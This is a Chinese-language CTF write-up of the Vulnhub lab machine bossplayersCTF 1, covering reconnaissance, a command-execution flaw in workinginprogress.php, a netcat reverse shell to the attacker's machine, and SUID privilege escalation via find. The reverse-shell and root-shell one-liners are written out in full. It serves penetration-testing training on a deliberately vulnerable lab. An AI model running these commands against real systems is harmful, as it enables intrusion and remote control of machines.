Vulnhub靶机BOSSPLAYERSCTF1渗透测试详解
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
这是新手CTF得靶机还是老样子找到flag.txt即可。
Vulnhub靶机下载:
官网地址:https://www.vulnhub.com/entry/bossplayersctf-1,375/
Vulnhub靶机安装:
下载好了把安装包解压 然后使用Oracle VM即可。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/9f1564c27bd7474c9892e3a7f4af9875.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/dd14e995d41a429d9ca84606b96583c1.png)
Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用netdiscover 发现主机 ![在这里插入图片描述](https://img-blog.csdnimg.cn/709a316004114829bcdd7cdbbfc33c64.png) 渗透机:kali IP :192.168.0.101 靶机IP :192.168.0.100
使用命令:nmap -sS -sV -A -n 192.168.0.100 ![在这里插入图片描述](https://img-blog.csdnimg.cn/784dfcd39b2949cab9de7a3b3795464d.png)
发现开启了80 端口和22 端口,先访问一下80 端口 dirb 扫一下后台发现index.txt,robots.txt,server-status 依次进行访问。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/f7a663feaf1b404da3986c2f154c6abc.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/a310c9c8ae74427c8caa7f23788cd3a0.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/bf7a9406588f4849a17a17f279955702.png) 先访问一下robots.txt 发现了一串base64 加密数值 放kali 解密一下 它让我们在努力点兄弟,哈哈哈哈。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/55b97f8f565c4742bcfc34e8b44be262.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/c0f53b3e68eb489d9cf9e01074e08b3c.png) 我们再看看logs.php 看源码会比较完整一点,发现并没有什么可用信息继续访问server-status 也没有可用信息。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/675720a7c17541f4a64136851c30f6f4.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/1db8ff1926a24969af4c4d9cdc957f85.png) 在看看index.html 查看一下源码 在最下面发现一串base64 继续解码解了三次发现一个php 文件:workinginprogress.php ![在这里插入图片描述](https://img-blog.csdnimg.cn/6e825f8f5ad84b11b186fb032e773951.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/a17c69955b454e66bcc158c7147704b9.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/b214eb4f0be946d6889127243a4241c8.png)
②:命令执行漏洞:
访问这个文件好像可以命令执行 可以使用工具wfuzz 检测 我这里直接手动了
http://192.168.0.100/workinginprogress.php?cmd=id
![在这里插入图片描述](https://img-blog.csdnimg.cn/08521e0b171f4c6686bffa6156315e76.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/ded9fa94a63a4e7db0cde47618318149.png)
③:反弹shell:
先看看靶机里面有没有nc 可以利用漏洞使用命令:http://192.168.0.100/workinginprogress.php?cmd=ls /usr/bin|grep nc ![在这里插入图片描述](https://img-blog.csdnimg.cn/f9c921ff5bac4bc98a6b5b33cfb19a31.png) 接着开启本机kali 开启监听端口6666 执行:192.168.0.100/workinginprogress.php?cmd=nc 192.168.0.101 6666 -e/bin/bash
使用python 开启交互:python -c "import pty;pty.spawn('/bin/bash')" ![在这里插入图片描述](https://img-blog.csdnimg.cn/86030f0fd14a4b18a92032df5bbc564f.png)
④:suid提权:
使用命令:find / -perm -u=s -type f 2>/dev/null 查找具有suid 权限的文件,通过find 提权,获得权限。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/bba0b1c2c0764f848c0c3128063830f9.png) 使用命令:find . -exec /bin/bash -p \; ![在这里插入图片描述](https://img-blog.csdnimg.cn/b35cf3d7620540bc95fb2c41390811b6.png)
⑤:获取flag:
![在这里插入图片描述](https://img-blog.csdnimg.cn/dbdd835b585c40b0989fa1c68bd22a5f.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/238c48dc41b0415281d724f371caa304.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/76136931f6de40818ab9b8d4ac66014f.png) 至此得到了congratulations 祝贺自己,渗透测试结束。
Vulnhub靶机渗透总结:
这个靶场比较适合新手 比较基础容易上手 总结一下知识点: ①:netdiscover 工具得使用 ②:nmap 的基础使用 (具体可以学一下脚本的使用) ③:dirb (web目录扫描工具) ④:wfuzz 工具得使用 ⑤:suid 提权 (Linux提权大家可以学习一下) 第一次凌晨熬夜创作,希望对刚学网安的小白有所帮助 (最后一天假期肝一下,明天返校了)感谢支持!!**
|